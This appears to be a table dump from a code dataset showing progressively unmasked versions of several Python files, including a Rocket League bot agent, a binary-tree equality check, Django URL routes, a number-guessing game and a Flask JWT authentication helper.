index
int64 0
10k
| blob_id
stringlengths 40
40
| step-1
stringlengths 13
984k
| step-2
stringlengths 6
1.23M
⌀ | step-3
stringlengths 15
1.34M
⌀ | step-4
stringlengths 30
1.34M
⌀ | step-5
stringlengths 64
1.2M
⌀ | step-ids
sequencelengths 1
5
|
---|---|---|---|---|---|---|---|
600 | 1a0d4e77f09b4ce752631ae36a83ff57f96b89b1 | <mask token>
class MyBot(BaseAgent):
<mask token>
def initialize_agent(self):
self.boost_pad_tracker.initialize_boosts(self.get_field_info())
self.info = MyInfo(self.team, self.index)
self.strat = Strategy(self.info)
self.car = Car()
def get_output(self, packet: GameTickPacket) ->SimpleControllerState:
"""
This function will be called by the framework many times per second. This is where you can
see the motion of the ball, etc. and return controls to drive your car.
"""
self.boost_pad_tracker.update_boost_status(packet)
self.car.updateCar(packet, self.index)
self.info.read_packet(packet, self.get_ball_prediction_struct().slices)
if self.action is None:
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
print(controls.steer)
return controls
self.renderer.draw_string_3d(self.car.loc, 1, 1,
f'Speed: {self.car.vel.length():.1f}', self.renderer.white())
if self.action.name:
self.renderer.draw_string_3d(self.car.loc + Vec3(0, 0, 20), 1,
1, self.action.name, self.renderer.white())
if packet.game_info.is_kickoff_pause and not isinstance(self.action,
kickoff):
self.action = kickoff(self.car.loc)
controls = self.action.tick(self.info)
return controls
if self.action and not self.action.done:
controls = self.action.tick(self.info)
if controls is not None:
return controls
elif self.action.done:
print('choosing new action')
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
return controls
ball_location = Vec3(packet.game_ball.physics.location)
if self.car.loc.dist(ball_location) > 1500:
ball_prediction = self.get_ball_prediction_struct()
ball_in_future = find_slice_at_time(ball_prediction, packet.
game_info.seconds_elapsed + 2)
target_location = Vec3(ball_in_future.physics.location)
self.renderer.draw_line_3d(ball_location, target_location, self
.renderer.cyan())
else:
target_location = ball_location
"""
if 750 < self.car.vel.length() < 800:
# We'll do a front flip if the car is moving at a certain speed.
return self.begin_front_flip(packet)
#controls = self.action.controls
controls = SimpleControllerState()
controls.steer = steer_toward_target(self.car, target_location)
controls.throttle = 1.0
# You can set more controls if you want, like controls.boost.
"""
print('the fuck we doin here?!?!?!?')
return controls
def begin_front_flip(self, packet):
self.send_quick_chat(team_only=False, quick_chat=QuickChatSelection
.Information_IGotIt)
self.action = Sequence([ControlStep(duration=0.05, controls=
SimpleControllerState(jump=True)), ControlStep(duration=0.05,
controls=SimpleControllerState(jump=False)), ControlStep(
duration=0.2, controls=SimpleControllerState(jump=True, pitch=-
1)), ControlStep(duration=0.8, controls=SimpleControllerState())])
return self.action.tick(packet)
def is_kickoff(self, ball_location, ball_velocity):
return ball_location.flat(
) == kickoff_location and ball_velocity.length() == 0
<mask token>
| <mask token>
class MyBot(BaseAgent):
def __init__(self, name, team, index):
super().__init__(name, team, index)
self.action: Action = kickoff
self.info: GameInfo = None
self.car: Car = None
self.boost_pad_tracker = BoostPadTracker()
self.stat: Strategy = None
self.action: Action = None
def initialize_agent(self):
self.boost_pad_tracker.initialize_boosts(self.get_field_info())
self.info = MyInfo(self.team, self.index)
self.strat = Strategy(self.info)
self.car = Car()
def get_output(self, packet: GameTickPacket) ->SimpleControllerState:
"""
This function will be called by the framework many times per second. This is where you can
see the motion of the ball, etc. and return controls to drive your car.
"""
self.boost_pad_tracker.update_boost_status(packet)
self.car.updateCar(packet, self.index)
self.info.read_packet(packet, self.get_ball_prediction_struct().slices)
if self.action is None:
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
print(controls.steer)
return controls
self.renderer.draw_string_3d(self.car.loc, 1, 1,
f'Speed: {self.car.vel.length():.1f}', self.renderer.white())
if self.action.name:
self.renderer.draw_string_3d(self.car.loc + Vec3(0, 0, 20), 1,
1, self.action.name, self.renderer.white())
if packet.game_info.is_kickoff_pause and not isinstance(self.action,
kickoff):
self.action = kickoff(self.car.loc)
controls = self.action.tick(self.info)
return controls
if self.action and not self.action.done:
controls = self.action.tick(self.info)
if controls is not None:
return controls
elif self.action.done:
print('choosing new action')
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
return controls
ball_location = Vec3(packet.game_ball.physics.location)
if self.car.loc.dist(ball_location) > 1500:
ball_prediction = self.get_ball_prediction_struct()
ball_in_future = find_slice_at_time(ball_prediction, packet.
game_info.seconds_elapsed + 2)
target_location = Vec3(ball_in_future.physics.location)
self.renderer.draw_line_3d(ball_location, target_location, self
.renderer.cyan())
else:
target_location = ball_location
"""
if 750 < self.car.vel.length() < 800:
# We'll do a front flip if the car is moving at a certain speed.
return self.begin_front_flip(packet)
#controls = self.action.controls
controls = SimpleControllerState()
controls.steer = steer_toward_target(self.car, target_location)
controls.throttle = 1.0
# You can set more controls if you want, like controls.boost.
"""
print('the fuck we doin here?!?!?!?')
return controls
def begin_front_flip(self, packet):
self.send_quick_chat(team_only=False, quick_chat=QuickChatSelection
.Information_IGotIt)
self.action = Sequence([ControlStep(duration=0.05, controls=
SimpleControllerState(jump=True)), ControlStep(duration=0.05,
controls=SimpleControllerState(jump=False)), ControlStep(
duration=0.2, controls=SimpleControllerState(jump=True, pitch=-
1)), ControlStep(duration=0.8, controls=SimpleControllerState())])
return self.action.tick(packet)
def is_kickoff(self, ball_location, ball_velocity):
return ball_location.flat(
) == kickoff_location and ball_velocity.length() == 0
<mask token>
| <mask token>
kickoff_location = Vec3(0, 0, 0)
class MyBot(BaseAgent):
def __init__(self, name, team, index):
super().__init__(name, team, index)
self.action: Action = kickoff
self.info: GameInfo = None
self.car: Car = None
self.boost_pad_tracker = BoostPadTracker()
self.stat: Strategy = None
self.action: Action = None
def initialize_agent(self):
self.boost_pad_tracker.initialize_boosts(self.get_field_info())
self.info = MyInfo(self.team, self.index)
self.strat = Strategy(self.info)
self.car = Car()
def get_output(self, packet: GameTickPacket) ->SimpleControllerState:
"""
This function will be called by the framework many times per second. This is where you can
see the motion of the ball, etc. and return controls to drive your car.
"""
self.boost_pad_tracker.update_boost_status(packet)
self.car.updateCar(packet, self.index)
self.info.read_packet(packet, self.get_ball_prediction_struct().slices)
if self.action is None:
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
print(controls.steer)
return controls
self.renderer.draw_string_3d(self.car.loc, 1, 1,
f'Speed: {self.car.vel.length():.1f}', self.renderer.white())
if self.action.name:
self.renderer.draw_string_3d(self.car.loc + Vec3(0, 0, 20), 1,
1, self.action.name, self.renderer.white())
if packet.game_info.is_kickoff_pause and not isinstance(self.action,
kickoff):
self.action = kickoff(self.car.loc)
controls = self.action.tick(self.info)
return controls
if self.action and not self.action.done:
controls = self.action.tick(self.info)
if controls is not None:
return controls
elif self.action.done:
print('choosing new action')
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
return controls
ball_location = Vec3(packet.game_ball.physics.location)
if self.car.loc.dist(ball_location) > 1500:
ball_prediction = self.get_ball_prediction_struct()
ball_in_future = find_slice_at_time(ball_prediction, packet.
game_info.seconds_elapsed + 2)
target_location = Vec3(ball_in_future.physics.location)
self.renderer.draw_line_3d(ball_location, target_location, self
.renderer.cyan())
else:
target_location = ball_location
"""
if 750 < self.car.vel.length() < 800:
# We'll do a front flip if the car is moving at a certain speed.
return self.begin_front_flip(packet)
#controls = self.action.controls
controls = SimpleControllerState()
controls.steer = steer_toward_target(self.car, target_location)
controls.throttle = 1.0
# You can set more controls if you want, like controls.boost.
"""
print('the fuck we doin here?!?!?!?')
return controls
def begin_front_flip(self, packet):
self.send_quick_chat(team_only=False, quick_chat=QuickChatSelection
.Information_IGotIt)
self.action = Sequence([ControlStep(duration=0.05, controls=
SimpleControllerState(jump=True)), ControlStep(duration=0.05,
controls=SimpleControllerState(jump=False)), ControlStep(
duration=0.2, controls=SimpleControllerState(jump=True, pitch=-
1)), ControlStep(duration=0.8, controls=SimpleControllerState())])
return self.action.tick(packet)
def is_kickoff(self, ball_location, ball_velocity):
return ball_location.flat(
) == kickoff_location and ball_velocity.length() == 0
<mask token>
| from rlbot.agents.base_agent import BaseAgent, GameTickPacket, SimpleControllerState
from Decisions.challengeGame import ChallengeGame
from Decisions.info import MyInfo, Car
from Decisions.strat import Strategy
from Drawing.Drawing import DrawingTool
from util.vec import Vec3
from Actions.Kickoff import kickoff
from Actions.Chase import chase
from rlbot.messages.flat.QuickChatSelection import QuickChatSelection
from rlbot.utils.structures.game_data_struct import GameTickPacket
from util.ball_prediction_analysis import find_slice_at_time
from util.boost_pad_tracker import BoostPadTracker
from util.drive import steer_toward_target
from util.sequence import Sequence, ControlStep
from util.vec import Vec3
import math
import time
from math import radians
kickoff_location = Vec3(0, 0, 0)
class MyBot(BaseAgent):
def __init__(self, name, team, index):
super().__init__(name, team, index)
self.action: Action = kickoff
self.info: GameInfo = None
self.car: Car = None
self.boost_pad_tracker = BoostPadTracker()
self.stat: Strategy = None
self.action: Action = None
def initialize_agent(self):
self.boost_pad_tracker.initialize_boosts(self.get_field_info())
self.info = MyInfo(self.team, self.index)
self.strat = Strategy(self.info)
self.car = Car()
def get_output(self, packet: GameTickPacket) ->SimpleControllerState:
"""
This function will be called by the framework many times per second. This is where you can
see the motion of the ball, etc. and return controls to drive your car.
"""
self.boost_pad_tracker.update_boost_status(packet)
self.car.updateCar(packet, self.index)
self.info.read_packet(packet, self.get_ball_prediction_struct().slices)
if self.action is None:
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
print(controls.steer)
return controls
self.renderer.draw_string_3d(self.car.loc, 1, 1,
f'Speed: {self.car.vel.length():.1f}', self.renderer.white())
if self.action.name:
self.renderer.draw_string_3d(self.car.loc + Vec3(0, 0, 20), 1,
1, self.action.name, self.renderer.white())
if packet.game_info.is_kickoff_pause and not isinstance(self.action,
kickoff):
self.action = kickoff(self.car.loc)
controls = self.action.tick(self.info)
return controls
if self.action and not self.action.done:
controls = self.action.tick(self.info)
if controls is not None:
return controls
elif self.action.done:
print('choosing new action')
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
return controls
ball_location = Vec3(packet.game_ball.physics.location)
if self.car.loc.dist(ball_location) > 1500:
ball_prediction = self.get_ball_prediction_struct()
ball_in_future = find_slice_at_time(ball_prediction, packet.
game_info.seconds_elapsed + 2)
target_location = Vec3(ball_in_future.physics.location)
self.renderer.draw_line_3d(ball_location, target_location, self
.renderer.cyan())
else:
target_location = ball_location
"""
if 750 < self.car.vel.length() < 800:
# We'll do a front flip if the car is moving at a certain speed.
return self.begin_front_flip(packet)
#controls = self.action.controls
controls = SimpleControllerState()
controls.steer = steer_toward_target(self.car, target_location)
controls.throttle = 1.0
# You can set more controls if you want, like controls.boost.
"""
print('the fuck we doin here?!?!?!?')
return controls
def begin_front_flip(self, packet):
self.send_quick_chat(team_only=False, quick_chat=QuickChatSelection
.Information_IGotIt)
self.action = Sequence([ControlStep(duration=0.05, controls=
SimpleControllerState(jump=True)), ControlStep(duration=0.05,
controls=SimpleControllerState(jump=False)), ControlStep(
duration=0.2, controls=SimpleControllerState(jump=True, pitch=-
1)), ControlStep(duration=0.8, controls=SimpleControllerState())])
return self.action.tick(packet)
def is_kickoff(self, ball_location, ball_velocity):
return ball_location.flat(
) == kickoff_location and ball_velocity.length() == 0
<mask token>
| from rlbot.agents.base_agent import BaseAgent, GameTickPacket, SimpleControllerState
#from rlbot.utils.structures.game_data_struct import GameTickPacket
from Decisions.challengeGame import ChallengeGame
from Decisions.info import MyInfo, Car
from Decisions.strat import Strategy
from Drawing.Drawing import DrawingTool
from util.vec import Vec3
from Actions.Kickoff import kickoff
from Actions.Chase import chase
# Blue team's (0) goal is located at (0, -5120)
# Orange (1) at (0, 5120)
# ball R = 92
from rlbot.messages.flat.QuickChatSelection import QuickChatSelection
from rlbot.utils.structures.game_data_struct import GameTickPacket
from util.ball_prediction_analysis import find_slice_at_time
from util.boost_pad_tracker import BoostPadTracker
from util.drive import steer_toward_target
from util.sequence import Sequence, ControlStep
from util.vec import Vec3
import math
import time
from math import radians
kickoff_location = Vec3(0, 0, 0)
class MyBot(BaseAgent):
def __init__(self, name, team, index):
super().__init__(name, team, index)
self.action: Action = kickoff
self.info : GameInfo = None
self.car : Car = None
self.boost_pad_tracker = BoostPadTracker()
self.stat : Strategy = None
self.action : Action = None
def initialize_agent(self):
# Set up information about the boost pads now that the game is active and the info is available
self.boost_pad_tracker.initialize_boosts(self.get_field_info())
self.info = MyInfo(self.team, self.index)
self.strat = Strategy(self.info)
self.car = Car()
def get_output(self, packet: GameTickPacket) -> SimpleControllerState:
"""
This function will be called by the framework many times per second. This is where you can
see the motion of the ball, etc. and return controls to drive your car.
"""
# Keep our boost pad info updated with which pads are currently active
self.boost_pad_tracker.update_boost_status(packet)
#self.info = self.info.read_packet(packet)
self.car.updateCar(packet, self.index)
self.info.read_packet(packet, self.get_ball_prediction_struct().slices)
#print("in main target: {}".format(self.get_ball_prediction_struct().slices[0].physics.location))
#self.renderer.draw_line_3d(self.car.loc, target_location, self.renderer.white())
#self.renderer.draw_rect_3d(target_location, 8, 8, True, self.renderer.cyan(), centered=True)
#cg = ChallengeGame(self.car, bp_struct)
#print(cg.get_time_to_loc(cg.challenge_loc))
# This is good to keep at the beginning of get_output. It will allow you to continue
# any sequences that you may have started during a previous call to get_output.
if self.action is None:
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
print(controls.steer)
return controls
self.renderer.draw_string_3d(self.car.loc, 1, 1, f'Speed: {self.car.vel.length():.1f}', self.renderer.white())
if self.action.name:
self.renderer.draw_string_3d(self.car.loc + Vec3(0, 0, 20), 1, 1, self.action.name, self.renderer.white())
if packet.game_info.is_kickoff_pause and not isinstance(self.action, kickoff):
#self.logger.info(self.action)
self.action = kickoff(self.car.loc)
#print("Sequence is: {}".format(self.action))
#print("Sequence finished: {}".format(self.action.done))
controls = self.action.tick(self.info)
return controls
if self.action and not self.action.done:
controls = self.action.tick(self.info)
#print("action is: {}".format(self.action.name))
if controls is not None:
return controls
elif self.action.done:
print("choosing new action")
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
return controls
# Gather some information about our car and the ball
ball_location = Vec3(packet.game_ball.physics.location)
if self.car.loc.dist(ball_location) > 1500:
# We're far away from the ball, let's try to lead it a little bit
ball_prediction = self.get_ball_prediction_struct() # This can predict bounces, etc
ball_in_future = find_slice_at_time(ball_prediction, packet.game_info.seconds_elapsed + 2)
target_location = Vec3(ball_in_future.physics.location)
self.renderer.draw_line_3d(ball_location, target_location, self.renderer.cyan())
else:
target_location = ball_location
# Draw some things to help understand what the bot is thinking
#self.renderer.draw_string_2d(100, 100, 1, 1, f'Ball at: {ball_location}', self.renderer.white())
'''
if 750 < self.car.vel.length() < 800:
# We'll do a front flip if the car is moving at a certain speed.
return self.begin_front_flip(packet)
#controls = self.action.controls
controls = SimpleControllerState()
controls.steer = steer_toward_target(self.car, target_location)
controls.throttle = 1.0
# You can set more controls if you want, like controls.boost.
'''
print("the fuck we doin here?!?!?!?")
return controls
def begin_front_flip(self, packet):
# Send some quickchat just for fun
self.send_quick_chat(team_only=False, quick_chat=QuickChatSelection.Information_IGotIt)
# Do a front flip. We will be committed to this for a few seconds and the bot will ignore other
# logic during that time because we are setting the action.
self.action = Sequence([
ControlStep(duration=0.05, controls=SimpleControllerState(jump=True)),
ControlStep(duration=0.05, controls=SimpleControllerState(jump=False)),
ControlStep(duration=0.2, controls=SimpleControllerState(jump=True, pitch=-1)),
ControlStep(duration=0.8, controls=SimpleControllerState()),
])
# Return the controls associated with the beginning of the sequence so we can start right away.
return self.action.tick(packet)
def is_kickoff(self, ball_location, ball_velocity):
#self.logger.info(ball_location.flat() == kickoff_location)
#self.logger.info(ball_velocity.length() == 0)
return ball_location.flat() == kickoff_location and ball_velocity.length() == 0
'''
class Bot(BaseAgent):
DEVMODE = True
def __init__(self, name, team, index):
super().__init__(name, team, index)
self.info: GameInfo = None
self.draw: DrawingTool = None
self.strat: Strategy = None
self.car = None
self.Actions: Maneuver = None
self.controls: SimpleControllerState = SimpleControllerState()
def initialize_agent(self):
#self.logger.info(rlutilities.__file__)
self.info = GameInfo(self.team)
#for field in self.info._fields_:
# print(field[0], getattr(self.info, field[0]))
self.info.set_mode("soccar")
self.draw = DrawingTool(self.renderer)
self.car = self.info.cars[self.index]
self.logger.info("my index is {}".format(self.index))
self.strat = Strategy(self.info, my_car)
def get_output(self, packet: GameTickPacket):
# Update game data variables
if self.tick_counter < 20:
self.tick_counter += 1
return Input()
if self.Actions is None and not self.Actions.finished:
controls = self.Action.tick(packet)
self.info.read_packet(packet, self.get_field_info(), self.get_ball_path())
self.draw.draw_path(self.get_ball_path())
challenge = ChallengeGame(self.info.cars[self.index], self.info.ball_path)
if challenge.should_go:
self.Action = self.strat.chooseAction(challenge, self.info.ball_path)
self.controls = self.Action.controls
print(self.Action)
if self.info.is_kickoff():
return self.do
self.controls = self.action.doThing(self.info)
if self.DEVMODE:
self.Action.render(self.draw)
challenge.render(self.draw)
return self.controls
def get_ball_path(self):
ball_prediction = self.get_ball_prediction_struct()
path = []
for i in range(0, ball_prediction.num_slices):
prediction_slice = ball_prediction.slices[i]
loc = prediction_slice.physics.location
path.append(loc)
return path
''' | [
5,
6,
7,
8,
9
] |
601 | 4a0eca90de3ce7fb0ab6decb0ec6aadb32c1a9fa | <mask token>
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
return rootA.val == rootB.val and self.solution(rootA.left, rootB.left
) and self.solution(rootA.right, rootB.right)
<mask token>
| <mask token>
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
return rootA.val == rootB.val and self.solution(rootA.left, rootB.left
) and self.solution(rootA.right, rootB.right)
<mask token>
A.insert(100)
A.insert(102)
A.insert(96)
<mask token>
B.insert(100)
B.insert(102)
B.insert(96)
<mask token>
print(res)
| <mask token>
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
return rootA.val == rootB.val and self.solution(rootA.left, rootB.left
) and self.solution(rootA.right, rootB.right)
A = BinaryTree()
A.insert(100)
A.insert(102)
A.insert(96)
B = BinaryTree()
B.insert(100)
B.insert(102)
B.insert(96)
res = Solution().solution(A.root, B.root)
print(res)
| from Level6.Trees.BinaryTree import BinaryTree
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
return rootA.val == rootB.val and self.solution(rootA.left, rootB.left
) and self.solution(rootA.right, rootB.right)
A = BinaryTree()
A.insert(100)
A.insert(102)
A.insert(96)
B = BinaryTree()
B.insert(100)
B.insert(102)
B.insert(96)
res = Solution().solution(A.root, B.root)
print(res)
| # Given two binary trees, write a function to check if they are equal or not.
#
# Two binary trees are considered equal if they are structurally identical and the nodes have the same value.
#
# Return 0 / 1 ( 0 for false, 1 for true ) for this problem
#
# Example :
#
# Input :
#
# 1 1
# / \ / \
# 2 3 2 3
#
# Output :
# 1 or True
from Level6.Trees.BinaryTree import BinaryTree
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
# if rootA is None and rootB is None:
# return True
return ((rootA.val == rootB.val) and self.solution(rootA.left, rootB.left) and
self.solution(rootA.right, rootB.right))
A = BinaryTree()
A.insert(100)
A.insert(102)
A.insert(96)
B = BinaryTree()
B.insert(100)
B.insert(102)
B.insert(96)
res = Solution().solution(A.root, B.root)
print(res)
| [
2,
3,
4,
5,
6
] |
602 | 0c1de2c1eb5a4de7aeb14ad6b27aa61e07bc4c51 | <mask token>
| <mask token>
app_name = 'trees'
urlpatterns = [path('list/', TreeListView.as_view(), name='list'), path(
'create/', TreeCreateView.as_view(), name='create'), path(
'<int:pk>/update/', TreeCreateView.as_view(), name='update')]
| from django.urls import path
from .views import TreeCreateView, TreeListView, TreeUpdateView
app_name = 'trees'
urlpatterns = [path('list/', TreeListView.as_view(), name='list'), path(
'create/', TreeCreateView.as_view(), name='create'), path(
'<int:pk>/update/', TreeCreateView.as_view(), name='update')]
| from django.urls import path
from .views import (
TreeCreateView,
TreeListView,
TreeUpdateView,
)
app_name = 'trees'
urlpatterns = [
path('list/', TreeListView.as_view(),
name='list'),
path('create/', TreeCreateView.as_view(),
name='create'),
path('<int:pk>/update/', TreeCreateView.as_view(),
name='update'),
]
| null | [
0,
1,
2,
3
] |
603 | 42d03aabef7d75c813f30bb6d8a835d76fd1fc83 | <mask token>
| <mask token>
print(' Guess a number between 0 and 100')
<mask token>
while condition != 1:
counter += 1
if condition == 0:
last = middle
elif condition == 2:
start = middle
middle = int((start + last) / 2)
condition = int(input('Is your guess ' + str(middle) +
"? (0 means it's too low, 1 means it's your guess and 2 means it's too high) "
))
print('It took us {} guesses to get it right! Cheers!'.format(counter))
| start = 0
last = 100
middle = 50
counter = 1
print(' Guess a number between 0 and 100')
condition = int(input('Is your guess ' + str(middle) +
"? (0 means it's too low, 1 means it's your guess and 2 means it's too high) "
))
while condition != 1:
counter += 1
if condition == 0:
last = middle
elif condition == 2:
start = middle
middle = int((start + last) / 2)
condition = int(input('Is your guess ' + str(middle) +
"? (0 means it's too low, 1 means it's your guess and 2 means it's too high) "
))
print('It took us {} guesses to get it right! Cheers!'.format(counter))
| start=0
last=100
middle=50
counter=1
print(" Guess a number between 0 and 100")
condition = int(input("Is your guess " + str(middle) + "? (0 means it's too low, 1 means it's your guess and 2 means it's too high) "))
while condition != 1:
counter += 1
if condition == 0:
last = middle
elif condition == 2:
start = middle
middle=int((start+last)/2)
condition = int(input("Is your guess " + str(middle) + "? (0 means it's too low, 1 means it's your guess and 2 means it's too high) "))
print("It took us {} guesses to get it right! Cheers!".format(counter))
| null | [
0,
1,
2,
3
] |
604 | 97d4387c7bfd141b5a7019b221adb550105d4351 | <mask token>
class AuthorizationError(ValueError):
pass
class BearerTokenValidator:
def __init__(self, access_token, app_context: AppContext):
self.access_token = access_token
user_service = app_context.user_service
self.blacklist_token_repo = app_context.blacklist_token_repo
self.payload = user_service.decode_auth_token(access_token, get_jwk())
def check_is_blacklisted(self):
is_blacklisted_token = BlacklistToken.check_blacklist(self.
access_token, self.blacklist_token_repo)
if is_blacklisted_token:
LOGGER.debug('Token blacklisted.')
raise AuthenticationError('Invalid token.')
return self
def check_username_claim(self):
if not self.payload.get('sub'):
LOGGER.debug('Token missing sub.')
raise AuthorizationError('Forbidden.')
return self
def check_user_exists(self, user):
if not user:
LOGGER.debug('Token user not found.')
raise AuthorizationError('Forbidden.')
return self
def check_has_permissions(self, user: User, permissions: list):
has_permissions = True
for permission in permissions:
if not user.role.has_permission(Permission.from_enum(permission)):
LOGGER.debug(f'Missing permission {permission}.')
has_permissions = False
LOGGER.debug(f'Required permissions: {permissions}')
if not has_permissions:
raise AuthorizationError('Forbidden.')
return self
@staticmethod
def from_authorization_header(authorization_header: str, app_context:
AppContext):
if not authorization_header:
LOGGER.debug('Authorization header not found.')
raise AuthenticationError('Invalid token.')
if 'Bearer ' not in authorization_header:
LOGGER.debug('Bearer token not found.')
raise AuthenticationError('Invalid token.')
access_token = authorization_header.split('Bearer')[1].strip()
LOGGER.debug(f'Bearer token is:\n"{access_token}"')
return BearerTokenValidator(access_token, app_context)
<mask token>
class ExceptionHandlers:
def __init__(self, app):
@app.errorhandler(AuthorizationError)
def handle_authorization_exception(e):
"""Return403 forbidden."""
return jsonify(str(e)), 403
@app.errorhandler(AuthenticationError)
def handle_authentication_exception(e):
"""Return401 authentication error."""
return jsonify(str(e)), 401
<mask token>
| <mask token>
class AuthenticationError(ValueError):
pass
class AuthorizationError(ValueError):
pass
class BearerTokenValidator:
def __init__(self, access_token, app_context: AppContext):
self.access_token = access_token
user_service = app_context.user_service
self.blacklist_token_repo = app_context.blacklist_token_repo
self.payload = user_service.decode_auth_token(access_token, get_jwk())
def check_is_blacklisted(self):
is_blacklisted_token = BlacklistToken.check_blacklist(self.
access_token, self.blacklist_token_repo)
if is_blacklisted_token:
LOGGER.debug('Token blacklisted.')
raise AuthenticationError('Invalid token.')
return self
def check_username_claim(self):
if not self.payload.get('sub'):
LOGGER.debug('Token missing sub.')
raise AuthorizationError('Forbidden.')
return self
def check_user_exists(self, user):
if not user:
LOGGER.debug('Token user not found.')
raise AuthorizationError('Forbidden.')
return self
def check_has_permissions(self, user: User, permissions: list):
has_permissions = True
for permission in permissions:
if not user.role.has_permission(Permission.from_enum(permission)):
LOGGER.debug(f'Missing permission {permission}.')
has_permissions = False
LOGGER.debug(f'Required permissions: {permissions}')
if not has_permissions:
raise AuthorizationError('Forbidden.')
return self
@staticmethod
def from_authorization_header(authorization_header: str, app_context:
AppContext):
if not authorization_header:
LOGGER.debug('Authorization header not found.')
raise AuthenticationError('Invalid token.')
if 'Bearer ' not in authorization_header:
LOGGER.debug('Bearer token not found.')
raise AuthenticationError('Invalid token.')
access_token = authorization_header.split('Bearer')[1].strip()
LOGGER.debug(f'Bearer token is:\n"{access_token}"')
return BearerTokenValidator(access_token, app_context)
<mask token>
class ExceptionHandlers:
def __init__(self, app):
@app.errorhandler(AuthorizationError)
def handle_authorization_exception(e):
"""Return403 forbidden."""
return jsonify(str(e)), 403
@app.errorhandler(AuthenticationError)
def handle_authentication_exception(e):
"""Return401 authentication error."""
return jsonify(str(e)), 401
<mask token>
def issue_token_for_user(user: User):
access_token = new_token({'iss': 'lorem.ipsum.dev', 'aud':
'lorem.ipsum.auth', 'sub': user.username, 'email': user.email,
'roles': [user.role.name], 'exp': datetime.datetime.now(tz=datetime
.timezone.utc) + datetime.timedelta(hours=4), 'iat': datetime.
datetime.now(tz=datetime.timezone.utc)})
return access_token
| <mask token>
def app_context():
if 'app_context' not in g:
g.app_context = lorem_ipsum.create_app_context()
return g.app_context
@lru_cache()
def get_jwk():
LOGGER.debug('Loading jwk from public key...')
key_data = None
with open(app_context().config['jwk_public_key_path'], 'rb') as _key_file:
key_data = _key_file.read()
LOGGER.debug(key_data)
key = JsonWebKey.import_key(key_data, {'kty': 'RSA'})
_jwks = {'keys': [{**key.as_dict(), 'kid': 'demo_key'}]}
LOGGER.debug(_jwks)
return _jwks
class AuthenticationError(ValueError):
pass
class AuthorizationError(ValueError):
pass
class BearerTokenValidator:
def __init__(self, access_token, app_context: AppContext):
self.access_token = access_token
user_service = app_context.user_service
self.blacklist_token_repo = app_context.blacklist_token_repo
self.payload = user_service.decode_auth_token(access_token, get_jwk())
def check_is_blacklisted(self):
is_blacklisted_token = BlacklistToken.check_blacklist(self.
access_token, self.blacklist_token_repo)
if is_blacklisted_token:
LOGGER.debug('Token blacklisted.')
raise AuthenticationError('Invalid token.')
return self
def check_username_claim(self):
if not self.payload.get('sub'):
LOGGER.debug('Token missing sub.')
raise AuthorizationError('Forbidden.')
return self
def check_user_exists(self, user):
if not user:
LOGGER.debug('Token user not found.')
raise AuthorizationError('Forbidden.')
return self
def check_has_permissions(self, user: User, permissions: list):
has_permissions = True
for permission in permissions:
if not user.role.has_permission(Permission.from_enum(permission)):
LOGGER.debug(f'Missing permission {permission}.')
has_permissions = False
LOGGER.debug(f'Required permissions: {permissions}')
if not has_permissions:
raise AuthorizationError('Forbidden.')
return self
@staticmethod
def from_authorization_header(authorization_header: str, app_context:
AppContext):
if not authorization_header:
LOGGER.debug('Authorization header not found.')
raise AuthenticationError('Invalid token.')
if 'Bearer ' not in authorization_header:
LOGGER.debug('Bearer token not found.')
raise AuthenticationError('Invalid token.')
access_token = authorization_header.split('Bearer')[1].strip()
LOGGER.debug(f'Bearer token is:\n"{access_token}"')
return BearerTokenValidator(access_token, app_context)
def should_skip_auth(flask_request):
"""
Return true if should skip auth, e.g. when method is OPTIONS like when performing a React request.
:param flask_request: Flask request.
:return:
"""
return flask_request.method in ['HEAD', 'OPTIONS']
<mask token>
class ExceptionHandlers:
def __init__(self, app):
@app.errorhandler(AuthorizationError)
def handle_authorization_exception(e):
"""Return403 forbidden."""
return jsonify(str(e)), 403
@app.errorhandler(AuthenticationError)
def handle_authentication_exception(e):
"""Return401 authentication error."""
return jsonify(str(e)), 401
@lru_cache()
def jwk_key():
jwk_path = os.environ.get('jwk_private_key_path') or app_context().config[
'jwk_private_key_path']
with open(jwk_path, 'rb') as f:
key = JsonWebKey.import_key(f.read())
return key
def new_token(payload: dict):
key = jwk_key()
header = {'alg': 'RS256', 'kid': 'demo_key'}
token = jwt.encode(header, payload, key)
LOGGER.debug(token)
return token.decode('utf-8')
def issue_token_for_user(user: User):
access_token = new_token({'iss': 'lorem.ipsum.dev', 'aud':
'lorem.ipsum.auth', 'sub': user.username, 'email': user.email,
'roles': [user.role.name], 'exp': datetime.datetime.now(tz=datetime
.timezone.utc) + datetime.timedelta(hours=4), 'iat': datetime.
datetime.now(tz=datetime.timezone.utc)})
return access_token
| <mask token>
LOGGER = logging.getLogger('lorem-ipsum')
def app_context():
if 'app_context' not in g:
g.app_context = lorem_ipsum.create_app_context()
return g.app_context
@lru_cache()
def get_jwk():
LOGGER.debug('Loading jwk from public key...')
key_data = None
with open(app_context().config['jwk_public_key_path'], 'rb') as _key_file:
key_data = _key_file.read()
LOGGER.debug(key_data)
key = JsonWebKey.import_key(key_data, {'kty': 'RSA'})
_jwks = {'keys': [{**key.as_dict(), 'kid': 'demo_key'}]}
LOGGER.debug(_jwks)
return _jwks
class AuthenticationError(ValueError):
pass
class AuthorizationError(ValueError):
pass
class BearerTokenValidator:
def __init__(self, access_token, app_context: AppContext):
self.access_token = access_token
user_service = app_context.user_service
self.blacklist_token_repo = app_context.blacklist_token_repo
self.payload = user_service.decode_auth_token(access_token, get_jwk())
